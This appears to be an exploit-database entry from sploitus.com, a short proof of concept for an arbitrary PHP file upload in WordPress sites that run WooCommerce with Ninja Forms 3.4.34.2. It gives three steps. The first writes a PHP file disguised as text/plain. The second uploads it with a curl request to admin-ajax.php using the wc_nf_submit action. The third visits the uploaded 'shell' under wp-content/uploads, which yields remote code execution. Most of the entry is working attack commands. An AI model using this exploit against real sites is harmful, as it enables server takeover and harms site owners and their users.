Share
## https://sploitus.com/exploit?id=WPEX-ID:0035EC5E-D405-4EB7-8FE4-29DD0C71E4BC
Make sure to have both WooCommerce and NinjaForms 3.4.34.2 (NF's latest version on the 3.4 branch) installed, then follow those instructions:

1 - Run the following shell command to create a PHP file who's mime type will be detected as text/plain:

echo 'Hello world! <?php phpinfo();' > shell.php

2 - Run the following curl command to upload the malicious PHP file onto the site:

curl 'https://example.com/wp-admin/admin-ajax.php' -F 'action=wc_nf_submit' -F 'f[]=@shell.php'

3 - Visit the uploaded shell at 'https://example.com/wp-content/uploads/YYYY/MM/shell.php